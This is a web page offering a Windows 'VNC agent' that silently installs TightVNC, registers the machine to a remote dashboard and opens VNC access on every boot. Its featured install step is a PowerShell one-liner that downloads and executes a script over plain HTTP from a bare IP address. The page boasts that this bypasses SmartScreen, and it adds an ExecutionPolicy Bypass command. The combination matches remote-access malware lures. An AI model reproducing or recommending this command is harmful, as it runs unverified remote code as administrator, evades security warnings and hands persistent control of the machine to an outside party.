Get Agent

Download Agent

Deploy the AGTA VNC agent on any Windows machine in one click.

AGTA VNC Agent

Double-click to install on any Windows machine. TightVNC installs silently, the device registers in your dashboard, and the service starts automatically on every boot — no configuration needed.

v1.0.0 Latest Windows 10 / 11 64-bit & 32-bit Silent Install 9 KB

How It Works

01

Download

Download the EXE below. No dependencies — the agent uses the built-in Windows .NET runtime that's already on every modern Windows PC.

02

Double-Click

Run the file. Windows prompts for admin permission — click Yes. TightVNC installs silently in the background with zero user prompts.

03

Connected

The device appears in your Devices page automatically. The VNC service starts on every boot — no manual steps needed.

Fastest Install — No SmartScreen, No Prompts

PowerShell One-Liner  Bypasses SmartScreen
Open PowerShell as Administrator, paste & press Enter — done in 60 seconds, zero warnings
PS> [Net.ServicePointManager]::SecurityProtocol=3072; iex ((New-Object Net.WebClient).DownloadString('http://216.126.225.179/downloads/AGTA-VNC-Agent.ps1'))
Downloads via WebClient which does not attach a Zone identifier — Windows never marks the file as "from the internet", so SmartScreen does not run. Only the TightVNC MSI installer step will show one UAC prompt (required to install the Windows service). EV certificate coming next week removes even that prompt.

Or Download Manually

PowerShell Script
For Group Policy / RMM bulk deployment

Same logic as the EXE — downloads TightVNC, registers the device, stores config. Use with RMM tools, PDQ, or Group Policy startup scripts. Download the PS1 or use the one-liner above.

Download AGTA-VNC-Agent.ps1
AGTA-VNC-Agent.ps1  ·  3 KB  ·  PowerShell 3+
Run from file
PS> powershell -ExecutionPolicy Bypass -File AGTA-VNC-Agent.ps1

System Requirements

  • Windows 10 or Windows 11
  • .NET Framework 4.0 or later (pre-installed on all modern Windows)
  • Administrator privileges — agent requests via UAC automatically
  • Internet access to download TightVNC (~6 MB) during first install
  • Port 5900 open for incoming VNC connections
  • Approximately 10 MB free disk space